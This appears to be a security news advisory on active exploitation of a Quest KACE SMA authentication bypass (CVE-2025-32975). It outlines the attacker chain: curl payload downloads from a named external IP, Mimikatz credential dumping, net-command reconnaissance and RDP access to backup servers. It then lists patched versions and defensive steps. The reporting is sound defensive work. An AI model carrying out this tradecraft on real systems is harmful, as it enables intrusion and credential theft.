Quest KACE CVSS 10.0 Authentication Bypass Exploited to Hijack Admin Accounts and Target Backup Infrastructure
Arctic Wolf observes active exploitation of CVE-2025-32975 in Quest KACE SMA — a maximum-severity authentication bypass enabling full admin takeover, Mimikatz credential harvesting, and RDP access to Veeam and Veritas backup systems.
Threat actors are actively exploiting CVE-2025-32975, a CVSS 10.0 authentication bypass in Quest KACE Systems Management Appliance (SMA), to seize administrative control of unpatched systems exposed to the internet and pivot into backup infrastructure, according to Arctic Wolf.
The malicious activity was first observed the week of March 9, 2026 across multiple customer environments. The vulnerability, patched by Quest in May 2025, allows attackers to impersonate legitimate users without valid credentials — enabling complete takeover of administrative accounts. Systems that remain unpatched nearly ten months after the fix are now being actively targeted.
Attack Chain
Arctic Wolf documented a multi-stage post-exploitation sequence following initial admin account takeover:
1. Initial exploitation — attackers weaponize CVE-2025-32975 to bypass authentication and gain administrative access to the KACE SMA console
2. Payload delivery — remote commands execute via the compromised admin interface, using curl to download Base64-encoded payloads from an external server (216.126.225[.]156)
3. Persistence — additional administrative accounts are created through runkbot.exe, a legitimate SMA Agent background process used for script execution and installation management. Windows Registry modifications via PowerShell scripts indicate further persistence or system configuration changes
4. Credential harvesting — Mimikatz deployed to dump credentials from memory
5. Reconnaissance — enumeration of logged-in users, administrator accounts, and domain information via net time and net group commands
6. Backup infrastructure targeting — attackers obtain RDP access to Veeam and Veritas backup servers as well as domain controllers
Backup Infrastructure as the End Goal
The deliberate targeting of Veeam and Veritas backup systems alongside domain controllers is a hallmark of ransomware pre-positioning. Attackers who control both Active Directory and backup infrastructure can encrypt an environment with confidence that recovery options have been eliminated.
While Arctic Wolf states the ultimate goal of the attacks is currently unknown, the tactical pattern — admin takeover, credential harvesting, discovery, and backup access — is consistent with the preparation phase of a ransomware deployment.
Patched Versions
The vulnerability has been addressed in the following Quest KACE SMA versions:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
Defender Recommendations
- Patch immediately — this is a CVSS 10.0 with confirmed exploitation; any internet-exposed KACE SMA instance running an unpatched version should be treated as an emergency
- Remove KACE SMA from the internet — management interfaces should not be publicly accessible under any circumstances
- Audit administrative accounts — check for any accounts created via
runkbot.exeor through unexpected admin console activity since March 9 - Hunt for Mimikatz artifacts — search for credential harvesting indicators across endpoints managed by compromised KACE instances
- Protect backup infrastructure — restrict RDP access to Veeam and Veritas servers, enforce MFA, and ensure backup systems are network-segmented from general administrative access
- Monitor for discovery commands — flag execution of
net time,net group, and user enumeration commands from KACE-managed systems - Check for Registry modifications — review PowerShell-driven Registry changes on endpoints within affected environments
- Block IOC — add
216.126.225[.]156to blocklists
